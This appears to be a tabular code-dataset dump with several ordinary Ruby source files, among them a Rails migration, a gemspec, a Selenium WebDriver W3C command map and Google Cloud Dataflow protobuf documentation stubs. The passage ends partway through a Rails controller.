hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e8950541ca32e4e3b68f755c9dda38639dd556cb | 118 | class AddTransferNote < ActiveRecord::Migration[5.1]
def change
add_column :transfers, :note, :string
end
end
| 19.666667 | 52 | 0.737288 |
f81f3b78b49052672e073edec719c4e135ad411d | 320 | # frozen_string_literal: true
require 'rails_helper'
def like(user)
expect do
click_button 'Like'
end.to change(Like, :count).by(1)
expect(page).to have_content('Liked!')
expect(page).to have_content("#{user.first_name} #{user.last_name}")
expect(page).to_not have_xpath('//input', text: 'Dislike')
end
| 22.857143 | 70 | 0.709375 |
e2975e28af6d2d8e61779bbe0173f85ba1c374d7 | 1,541 | # frozen_string_literal: true
require_relative "lib/ruby2d/tiled/version"
Gem::Specification.new do |spec|
spec.name = "ruby2d-tiled"
spec.version = Ruby2d::Tiled::VERSION
spec.authors = ["Mario Visic"]
spec.email = ["[email protected]"]
spec.summary = "A tiled map generator plugin for ruby-2d"
spec.description = "A tiled map generator plugin for ruby-2d"
spec.homepage = "https://github.com/mariovisic/ruby2d-tiled"
spec.license = "MIT"
spec.required_ruby_version = Gem::Requirement.new(">= 2.4.0")
spec.metadata["allowed_push_host"] = "https://rubygems.org/"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/mariovisic/ruby2d-tiled"
# spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path(__dir__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{\A(?:test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{\Aexe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
# Uncomment to register a new dependency of your gem
# spec.add_dependency "example-gem", "~> 1.0"
# For more information and examples about making a new gem, checkout our
# guide at: https://bundler.io/guides/creating_gem.html
end
| 40.552632 | 88 | 0.680078 |
216c372a4eae85bef8f336d4f67e2ac8cab984bc | 2,037 | module ActiveScaffold::Config
class Search < Base
self.crud_type = :read
def initialize(core_config)
@core = core_config
@text_search = self.class.text_search
@live = self.class.live?
# start with the ActionLink defined globally
@link = self.class.link.clone
@action_group = self.class.action_group.clone if self.class.action_group
end
# global level configuration
# --------------------------
# the ActionLink for this action
cattr_accessor :link
@@link = ActiveScaffold::DataStructures::ActionLink.new('show_search', :label => :search, :type => :collection, :security_method => :search_authorized?, :ignore_method => :search_ignore?)
# A flag for how the search should do full-text searching in the database:
# * :full: LIKE %?%
# * :start: LIKE ?%
# * :end: LIKE %?
# * false: LIKE ?
# Default is :full
cattr_accessor :text_search
@@text_search = :full
# whether submits the search as you type
cattr_writer :live
def self.live?
@@live
end
# instance-level configuration
# ----------------------------
# provides access to the list of columns specifically meant for the Search to use
def columns
# we want to delay initializing to the @core.columns set for as long as possible. Too soon and .search_sql will not be available to .searchable?
unless @columns
self.columns = @core.columns.collect{|c| c.name if @core.columns._inheritable.include?(c.name) and c.searchable? and c.column and c.column.text?}.compact
end
@columns
end
public :columns=
# A flag for how the search should do full-text searching in the database:
# * :full: LIKE %?%
# * :start: LIKE ?%
# * :end: LIKE %?
# * false: LIKE ?
# Default is :full
attr_accessor :text_search
# the ActionLink for this action
attr_accessor :link
# whether submits the search as you type
attr_writer :live
def live?
@live
end
end
end
| 29.1 | 191 | 0.635248 |
4ae62898ee7f8faae894dcb983fa673d893a01e2 | 310 | module Erp::Carts
class Compare < ApplicationRecord
has_many :compare_items, dependent: :destroy
def get_number_items
self.compare_items.count
end
def remove_compare_item(compare_item_id)
self.compare_items.where(id: compare_item_id).destroy_all
end
end
end
| 22.142857 | 63 | 0.709677 |
38f96e5ab100431f0c46bc490ff0efe738ffb04a | 195 | require "erubis"
module Capper
module Utils
module Systemd
def systemctl(*args)
run("systemctl --user " + [args].flatten.map(&:to_s).join(" "))
end
end
end
end
| 13.928571 | 71 | 0.589744 |
798bc4e2151f53721003c6f99f26d9a7401d723b | 6,084 | # frozen_string_literal: true
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Selenium
module WebDriver
module Remote
module W3C
#
# http://www.w3.org/TR/2015/WD-webdriver-20150918/#list-of-endpoints
# @api private
#
class Bridge
COMMANDS = {
#
# session handling
#
new_session: [:post, 'session'],
delete_session: [:delete, 'session/:session_id'],
#
# basic driver
#
get: [:post, 'session/:session_id/url'],
get_current_url: [:get, 'session/:session_id/url'],
back: [:post, 'session/:session_id/back'],
forward: [:post, 'session/:session_id/forward'],
refresh: [:post, 'session/:session_id/refresh'],
get_title: [:get, 'session/:session_id/title'],
#
# window and Frame handling
#
get_window_handle: [:get, 'session/:session_id/window'],
close_window: [:delete, 'session/:session_id/window'],
switch_to_window: [:post, 'session/:session_id/window'],
get_window_handles: [:get, 'session/:session_id/window/handles'],
fullscreen_window: [:post, 'session/:session_id/window/fullscreen'],
minimize_window: [:post, 'session/:session_id/window/minimize'],
maximize_window: [:post, 'session/:session_id/window/maximize'],
set_window_size: [:post, 'session/:session_id/window/size'],
get_window_size: [:get, 'session/:session_id/window/size'],
set_window_position: [:post, 'session/:session_id/window/position'],
get_window_position: [:get, 'session/:session_id/window/position'],
set_window_rect: [:post, 'session/:session_id/window/rect'],
get_window_rect: [:get, 'session/:session_id/window/rect'],
switch_to_frame: [:post, 'session/:session_id/frame'],
switch_to_parent_frame: [:post, 'session/:session_id/frame/parent'],
#
# element
#
find_element: [:post, 'session/:session_id/element'],
find_elements: [:post, 'session/:session_id/elements'],
find_child_element: [:post, 'session/:session_id/element/:id/element'],
find_child_elements: [:post, 'session/:session_id/element/:id/elements'],
get_active_element: [:get, 'session/:session_id/element/active'],
is_element_selected: [:get, 'session/:session_id/element/:id/selected'],
get_element_attribute: [:get, 'session/:session_id/element/:id/attribute/:name'],
get_element_property: [:get, 'session/:session_id/element/:id/property/:name'],
get_element_css_value: [:get, 'session/:session_id/element/:id/css/:property_name'],
get_element_text: [:get, 'session/:session_id/element/:id/text'],
get_element_tag_name: [:get, 'session/:session_id/element/:id/name'],
get_element_rect: [:get, 'session/:session_id/element/:id/rect'],
is_element_enabled: [:get, 'session/:session_id/element/:id/enabled'],
#
# document handling
#
get_page_source: [:get, 'session/:session_id/source'],
execute_script: [:post, 'session/:session_id/execute/sync'],
execute_async_script: [:post, 'session/:session_id/execute/async'],
#
# cookies
#
get_all_cookies: [:get, 'session/:session_id/cookie'],
get_cookie: [:get, 'session/:session_id/cookie/:name'],
add_cookie: [:post, 'session/:session_id/cookie'],
delete_cookie: [:delete, 'session/:session_id/cookie/:name'],
delete_all_cookies: [:delete, 'session/:session_id/cookie'],
#
# timeouts
#
set_timeout: [:post, 'session/:session_id/timeouts'],
#
# actions
#
actions: [:post, 'session/:session_id/actions'],
release_actions: [:delete, 'session/:session_id/actions'],
#
# Element Operations
#
element_click: [:post, 'session/:session_id/element/:id/click'],
element_tap: [:post, 'session/:session_id/element/:id/tap'],
element_clear: [:post, 'session/:session_id/element/:id/clear'],
element_send_keys: [:post, 'session/:session_id/element/:id/value'],
#
# alerts
#
dismiss_alert: [:post, 'session/:session_id/alert/dismiss'],
accept_alert: [:post, 'session/:session_id/alert/accept'],
get_alert_text: [:get, 'session/:session_id/alert/text'],
send_alert_text: [:post, 'session/:session_id/alert/text'],
#
# screenshot
#
take_screenshot: [:get, 'session/:session_id/screenshot'],
take_element_screenshot: [:get, 'session/:session_id/element/:id/screenshot'],
#
# server extensions
#
upload_file: [:post, 'session/:session_id/se/file']
}.freeze
end # Bridge
end # W3C
end # Remote
end # WebDriver
end # Selenium
| 38.751592 | 96 | 0.594181 |
b9387592ede025a182d268f7bac5e28ad93199ca | 298 | class CreateClassroomChats < ActiveRecord::Migration
def change
create_table :classroom_chats do |t|
t.references :classroom, index: true, foreign_key: true
t.references :user, index: true, foreign_key: true
t.text :content
t.timestamps null: false
end
end
end
| 24.833333 | 61 | 0.701342 |
abc7b5d44630168733ebb1f7f6fed8d1bb427c80 | 31,664 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Cloud
module Dataflow
module V1beta3
# Response to the request to launch a job from Flex Template.
# @!attribute [rw] job
# @return [::Google::Cloud::Dataflow::V1beta3::Job]
# The job that was launched, if the request was not a dry run and
# the job was successfully launched.
class LaunchFlexTemplateResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Container Spec.
# @!attribute [rw] image
# @return [::String]
# Name of the docker container image. E.g., gcr.io/project/some-image
# @!attribute [rw] metadata
# @return [::Google::Cloud::Dataflow::V1beta3::TemplateMetadata]
# Metadata describing a template including description and validation rules.
# @!attribute [rw] sdk_info
# @return [::Google::Cloud::Dataflow::V1beta3::SDKInfo]
# Required. SDK info of the Flex Template.
# @!attribute [rw] default_environment
# @return [::Google::Cloud::Dataflow::V1beta3::FlexTemplateRuntimeEnvironment]
# Default runtime environment for the job.
class ContainerSpec
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Launch FlexTemplate Parameter.
# @!attribute [rw] job_name
# @return [::String]
# Required. The job name to use for the created job. For update job request,
# job name should be same as the existing running job.
# @!attribute [rw] container_spec
# @return [::Google::Cloud::Dataflow::V1beta3::ContainerSpec]
# Spec about the container image to launch.
# @!attribute [rw] container_spec_gcs_path
# @return [::String]
# Cloud Storage path to a file with json serialized ContainerSpec as
# content.
# @!attribute [rw] parameters
# @return [::Google::Protobuf::Map{::String => ::String}]
# The parameters for FlexTemplate.
# Ex. \\{"num_workers":"5"}
# @!attribute [rw] launch_options
# @return [::Google::Protobuf::Map{::String => ::String}]
# Launch options for this flex template job. This is a common set of options
# across languages and templates. This should not be used to pass job
# parameters.
# @!attribute [rw] environment
# @return [::Google::Cloud::Dataflow::V1beta3::FlexTemplateRuntimeEnvironment]
# The runtime environment for the FlexTemplate job
# @!attribute [rw] update
# @return [::Boolean]
# Set this to true if you are sending a request to update a running
# streaming job. When set, the job name should be the same as the
# running job.
# @!attribute [rw] transform_name_mappings
# @return [::Google::Protobuf::Map{::String => ::String}]
# Use this to pass transform_name_mappings for streaming update jobs.
# Ex:\\{"oldTransformName":"newTransformName",...}'
class LaunchFlexTemplateParameter
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class ParametersEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class LaunchOptionsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class TransformNameMappingsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# The environment values to be set at runtime for flex template.
# @!attribute [rw] num_workers
# @return [::Integer]
# The initial number of Google Compute Engine instances for the job.
# @!attribute [rw] max_workers
# @return [::Integer]
# The maximum number of Google Compute Engine instances to be made
# available to your pipeline during execution, from 1 to 1000.
# @!attribute [rw] zone
# @return [::String]
# The Compute Engine [availability
# zone](https://cloud.google.com/compute/docs/regions-zones/regions-zones)
# for launching worker instances to run your pipeline.
# In the future, worker_zone will take precedence.
# @!attribute [rw] service_account_email
# @return [::String]
# The email address of the service account to run the job as.
# @!attribute [rw] temp_location
# @return [::String]
# The Cloud Storage path to use for temporary files.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] machine_type
# @return [::String]
# The machine type to use for the job. Defaults to the value from the
# template if not specified.
# @!attribute [rw] additional_experiments
# @return [::Array<::String>]
# Additional experiment flags for the job.
# @!attribute [rw] network
# @return [::String]
# Network to which VMs will be assigned. If empty or unspecified,
# the service will use the network "default".
# @!attribute [rw] subnetwork
# @return [::String]
# Subnetwork to which VMs will be assigned, if desired. You can specify a
# subnetwork using either a complete URL or an abbreviated path. Expected to
# be of the form
# "https://www.googleapis.com/compute/v1/projects/HOST_PROJECT_ID/regions/REGION/subnetworks/SUBNETWORK"
# or "regions/REGION/subnetworks/SUBNETWORK". If the subnetwork is located in
# a Shared VPC network, you must use the complete URL.
# @!attribute [rw] additional_user_labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Additional user labels to be specified for the job.
# Keys and values must follow the restrictions specified in the [labeling
# restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions)
# page.
# An object containing a list of "key": value pairs.
# Example: { "name": "wrench", "mass": "1kg", "count": "3" }.
# @!attribute [rw] kms_key_name
# @return [::String]
# Name for the Cloud KMS key for the job.
# Key format is:
# projects/<project>/locations/<location>/keyRings/<keyring>/cryptoKeys/<key>
# @!attribute [rw] ip_configuration
# @return [::Google::Cloud::Dataflow::V1beta3::WorkerIPAddressConfiguration]
# Configuration for VM IPs.
# @!attribute [rw] worker_region
# @return [::String]
# The Compute Engine region
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1". Mutually exclusive
# with worker_zone. If neither worker_region nor worker_zone is specified,
# default to the control plane's region.
# @!attribute [rw] worker_zone
# @return [::String]
# The Compute Engine zone
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1-a". Mutually exclusive
# with worker_region. If neither worker_region nor worker_zone is specified,
# a zone in the control plane's region is chosen based on available capacity.
# If both `worker_zone` and `zone` are set, `worker_zone` takes precedence.
# @!attribute [rw] enable_streaming_engine
# @return [::Boolean]
# Whether to enable Streaming Engine for the job.
# @!attribute [rw] flexrs_goal
# @return [::Google::Cloud::Dataflow::V1beta3::FlexResourceSchedulingGoal]
# Set FlexRS goal for the job.
# https://cloud.google.com/dataflow/docs/guides/flexrs
# @!attribute [rw] staging_location
# @return [::String]
# The Cloud Storage path for staging local files.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] sdk_container_image
# @return [::String]
# Docker registry location of container image to use for the 'worker harness.
# Default is the container for the version of the SDK. Note this field is
# only valid for portable pipelines.
# @!attribute [rw] disk_size_gb
# @return [::Integer]
# Worker disk size, in gigabytes.
# @!attribute [rw] autoscaling_algorithm
# @return [::Google::Cloud::Dataflow::V1beta3::AutoscalingAlgorithm]
# The algorithm to use for autoscaling
# @!attribute [rw] dump_heap_on_oom
# @return [::Boolean]
# If true, save a heap dump before killing a thread or process which is GC
# thrashing or out of memory. The location of the heap file will either be
# echoed back to the user, or the user will be given the opportunity to
# download the heap file.
# @!attribute [rw] save_heap_dumps_to_gcs_path
# @return [::String]
# Cloud Storage bucket (directory) to upload heap dumps to the given
# location. Enabling this implies that heap dumps should be generated on OOM
# (dump_heap_on_oom is set to true).
# @!attribute [rw] launcher_machine_type
# @return [::String]
# The machine type to use for launching the job. The default is
# n1-standard-1.
class FlexTemplateRuntimeEnvironment
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class AdditionalUserLabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# A request to launch a Cloud Dataflow job from a FlexTemplate.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] launch_parameter
# @return [::Google::Cloud::Dataflow::V1beta3::LaunchFlexTemplateParameter]
# Required. Parameter to launch a job form Flex Template.
# @!attribute [rw] location
# @return [::String]
# Required. The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request. E.g., us-central1, us-west1.
# @!attribute [rw] validate_only
# @return [::Boolean]
# If true, the request is validated but not actually executed.
# Defaults to false.
class LaunchFlexTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The environment values to set at runtime.
# @!attribute [rw] num_workers
# @return [::Integer]
# The initial number of Google Compute Engine instnaces for the job.
# @!attribute [rw] max_workers
# @return [::Integer]
# The maximum number of Google Compute Engine instances to be made
# available to your pipeline during execution, from 1 to 1000.
# @!attribute [rw] zone
# @return [::String]
# The Compute Engine [availability
# zone](https://cloud.google.com/compute/docs/regions-zones/regions-zones)
# for launching worker instances to run your pipeline.
# In the future, worker_zone will take precedence.
# @!attribute [rw] service_account_email
# @return [::String]
# The email address of the service account to run the job as.
# @!attribute [rw] temp_location
# @return [::String]
# The Cloud Storage path to use for temporary files.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] bypass_temp_dir_validation
# @return [::Boolean]
# Whether to bypass the safety checks for the job's temporary directory.
# Use with caution.
# @!attribute [rw] machine_type
# @return [::String]
# The machine type to use for the job. Defaults to the value from the
# template if not specified.
# @!attribute [rw] additional_experiments
# @return [::Array<::String>]
# Additional experiment flags for the job, specified with the
# `--experiments` option.
# @!attribute [rw] network
# @return [::String]
# Network to which VMs will be assigned. If empty or unspecified,
# the service will use the network "default".
# @!attribute [rw] subnetwork
# @return [::String]
# Subnetwork to which VMs will be assigned, if desired. You can specify a
# subnetwork using either a complete URL or an abbreviated path. Expected to
# be of the form
# "https://www.googleapis.com/compute/v1/projects/HOST_PROJECT_ID/regions/REGION/subnetworks/SUBNETWORK"
# or "regions/REGION/subnetworks/SUBNETWORK". If the subnetwork is located in
# a Shared VPC network, you must use the complete URL.
# @!attribute [rw] additional_user_labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Additional user labels to be specified for the job.
# Keys and values should follow the restrictions specified in the [labeling
# restrictions](https://cloud.google.com/compute/docs/labeling-resources#restrictions)
# page.
# An object containing a list of "key": value pairs.
# Example: { "name": "wrench", "mass": "1kg", "count": "3" }.
# @!attribute [rw] kms_key_name
# @return [::String]
# Name for the Cloud KMS key for the job.
# Key format is:
# projects/<project>/locations/<location>/keyRings/<keyring>/cryptoKeys/<key>
# @!attribute [rw] ip_configuration
# @return [::Google::Cloud::Dataflow::V1beta3::WorkerIPAddressConfiguration]
# Configuration for VM IPs.
# @!attribute [rw] worker_region
# @return [::String]
# The Compute Engine region
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1". Mutually exclusive
# with worker_zone. If neither worker_region nor worker_zone is specified,
# default to the control plane's region.
# @!attribute [rw] worker_zone
# @return [::String]
# The Compute Engine zone
# (https://cloud.google.com/compute/docs/regions-zones/regions-zones) in
# which worker processing should occur, e.g. "us-west1-a". Mutually exclusive
# with worker_region. If neither worker_region nor worker_zone is specified,
# a zone in the control plane's region is chosen based on available capacity.
# If both `worker_zone` and `zone` are set, `worker_zone` takes precedence.
# @!attribute [rw] enable_streaming_engine
# @return [::Boolean]
# Whether to enable Streaming Engine for the job.
class RuntimeEnvironment
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class AdditionalUserLabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# Metadata for a specific parameter.
# @!attribute [rw] name
# @return [::String]
# Required. The name of the parameter.
# @!attribute [rw] label
# @return [::String]
# Required. The label to display for the parameter.
# @!attribute [rw] help_text
# @return [::String]
# Required. The help text to display for the parameter.
# @!attribute [rw] is_optional
# @return [::Boolean]
# Optional. Whether the parameter is optional. Defaults to false.
# @!attribute [rw] regexes
# @return [::Array<::String>]
# Optional. Regexes that the parameter must match.
# @!attribute [rw] param_type
# @return [::Google::Cloud::Dataflow::V1beta3::ParameterType]
# Optional. The type of the parameter.
# Used for selecting input picker.
# @!attribute [rw] custom_metadata
# @return [::Google::Protobuf::Map{::String => ::String}]
# Optional. Additional metadata for describing this parameter.
class ParameterMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class CustomMetadataEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# Metadata describing a template.
# @!attribute [rw] name
# @return [::String]
# Required. The name of the template.
# @!attribute [rw] description
# @return [::String]
# Optional. A description of the template.
# @!attribute [rw] parameters
# @return [::Array<::Google::Cloud::Dataflow::V1beta3::ParameterMetadata>]
# The parameters for the template.
class TemplateMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# SDK Information.
# @!attribute [rw] language
# @return [::Google::Cloud::Dataflow::V1beta3::SDKInfo::Language]
# Required. The SDK Language.
# @!attribute [rw] version
# @return [::String]
# Optional. The SDK version.
class SDKInfo
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# SDK Language.
module Language
# UNKNOWN Language.
UNKNOWN = 0
# Java.
JAVA = 1
# Python.
PYTHON = 2
end
end
# RuntimeMetadata describing a runtime environment.
# @!attribute [rw] sdk_info
# @return [::Google::Cloud::Dataflow::V1beta3::SDKInfo]
# SDK Info for the template.
# @!attribute [rw] parameters
# @return [::Array<::Google::Cloud::Dataflow::V1beta3::ParameterMetadata>]
# The parameters for the template.
class RuntimeMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# A request to create a Cloud Dataflow job from a template.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] job_name
# @return [::String]
# Required. The job name to use for the created job.
# @!attribute [rw] gcs_path
# @return [::String]
# Required. A Cloud Storage path to the template from which to
# create the job.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
# @!attribute [rw] parameters
# @return [::Google::Protobuf::Map{::String => ::String}]
# The runtime parameters to pass to the job.
# @!attribute [rw] environment
# @return [::Google::Cloud::Dataflow::V1beta3::RuntimeEnvironment]
# The runtime environment for the job.
# @!attribute [rw] location
# @return [::String]
# The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request.
class CreateJobFromTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class ParametersEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# A request to retrieve a Cloud Dataflow job template.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] gcs_path
# @return [::String]
# Required. A Cloud Storage path to the template from which to
# create the job.
# Must be valid Cloud Storage URL, beginning with 'gs://'.
# @!attribute [rw] view
# @return [::Google::Cloud::Dataflow::V1beta3::GetTemplateRequest::TemplateView]
# The view to retrieve. Defaults to METADATA_ONLY.
# @!attribute [rw] location
# @return [::String]
# The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request.
class GetTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# The various views of a template that may be retrieved.
module TemplateView
# Template view that retrieves only the metadata associated with the
# template.
METADATA_ONLY = 0
end
end
# The response to a GetTemplate request.
# @!attribute [rw] status
# @return [::Google::Rpc::Status]
# The status of the get template request. Any problems with the
# request will be indicated in the error_details.
# @!attribute [rw] metadata
# @return [::Google::Cloud::Dataflow::V1beta3::TemplateMetadata]
# The template metadata describing the template name, available
# parameters, etc.
# @!attribute [rw] template_type
# @return [::Google::Cloud::Dataflow::V1beta3::GetTemplateResponse::TemplateType]
# Template Type.
# @!attribute [rw] runtime_metadata
# @return [::Google::Cloud::Dataflow::V1beta3::RuntimeMetadata]
# Describes the runtime metadata with SDKInfo and available parameters.
class GetTemplateResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# Template Type.
module TemplateType
# Unknown Template Type.
UNKNOWN = 0
# Legacy Template.
LEGACY = 1
# Flex Template.
FLEX = 2
end
end
# Parameters to provide to the template being launched.
# @!attribute [rw] job_name
# @return [::String]
# Required. The job name to use for the created job.
# @!attribute [rw] parameters
# @return [::Google::Protobuf::Map{::String => ::String}]
# The runtime parameters to pass to the job.
# @!attribute [rw] environment
# @return [::Google::Cloud::Dataflow::V1beta3::RuntimeEnvironment]
# The runtime environment for the job.
# @!attribute [rw] update
# @return [::Boolean]
# If set, replace the existing pipeline with the name specified by jobName
# with this pipeline, preserving state.
# @!attribute [rw] transform_name_mapping
# @return [::Google::Protobuf::Map{::String => ::String}]
# Only applicable when updating a pipeline. Map of transform name prefixes of
# the job to be replaced to the corresponding name prefixes of the new job.
class LaunchTemplateParameters
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class ParametersEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class TransformNameMappingEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# A request to launch a template.
# @!attribute [rw] project_id
# @return [::String]
# Required. The ID of the Cloud Platform project that the job belongs to.
# @!attribute [rw] validate_only
# @return [::Boolean]
# If true, the request is validated but not actually executed.
# Defaults to false.
# @!attribute [rw] gcs_path
# @return [::String]
# A Cloud Storage path to the template from which to create
# the job.
# Must be valid Cloud Storage URL, beginning with 'gs://'.
# @!attribute [rw] dynamic_template
# @return [::Google::Cloud::Dataflow::V1beta3::DynamicTemplateLaunchParams]
# Params for launching a dynamic template.
# @!attribute [rw] launch_parameters
# @return [::Google::Cloud::Dataflow::V1beta3::LaunchTemplateParameters]
# The parameters of the template to launch. This should be part of the
# body of the POST request.
# @!attribute [rw] location
# @return [::String]
# The [regional endpoint]
# (https://cloud.google.com/dataflow/docs/concepts/regional-endpoints) to
# which to direct the request.
class LaunchTemplateRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Response to the request to launch a template.
# @!attribute [rw] job
# @return [::Google::Cloud::Dataflow::V1beta3::Job]
# The job that was launched, if the request was not a dry run and
# the job was successfully launched.
class LaunchTemplateResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Used in the error_details field of a google.rpc.Status message, this
# indicates problems with the template parameter.
# @!attribute [rw] parameter_violations
# @return [::Array<::Google::Cloud::Dataflow::V1beta3::InvalidTemplateParameters::ParameterViolation>]
# Describes all parameter violations in a template request.
class InvalidTemplateParameters
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# A specific template-parameter violation.
# @!attribute [rw] parameter
# @return [::String]
# The parameter that failed to validate.
# @!attribute [rw] description
# @return [::String]
# A description of why the parameter failed to validate.
class ParameterViolation
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# Params which should be passed when launching a dynamic template.
# @!attribute [rw] gcs_path
# @return [::String]
# Path to dynamic template spec file on Cloud Storage.
# The file must be a Json serialized DynamicTemplateFieSpec object.
# @!attribute [rw] staging_location
# @return [::String]
# Cloud Storage path for staging dependencies.
# Must be a valid Cloud Storage URL, beginning with `gs://`.
class DynamicTemplateLaunchParams
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# ParameterType specifies what kind of input we need for this parameter.
module ParameterType
# Default input type.
DEFAULT = 0
# The parameter specifies generic text input.
TEXT = 1
# The parameter specifies a Cloud Storage Bucket to read from.
GCS_READ_BUCKET = 2
# The parameter specifies a Cloud Storage Bucket to write to.
GCS_WRITE_BUCKET = 3
# The parameter specifies a Cloud Storage file path to read from.
GCS_READ_FILE = 4
# The parameter specifies a Cloud Storage file path to write to.
GCS_WRITE_FILE = 5
# The parameter specifies a Cloud Storage folder path to read from.
GCS_READ_FOLDER = 6
# The parameter specifies a Cloud Storage folder to write to.
GCS_WRITE_FOLDER = 7
# The parameter specifies a Pub/Sub Topic.
PUBSUB_TOPIC = 8
# The parameter specifies a Pub/Sub Subscription.
PUBSUB_SUBSCRIPTION = 9
end
end
end
end
end
| 45.757225 | 116 | 0.596577 |
61d57207d4d1c3f44865b4ad7645353d38f1cb0b | 269 | class UsersController < ApplicationController
respond_to :json
def show
@user = User.find(params[:id])
end
def currentuser
@user = current_user
render 'users/show'
end
private
def user_params
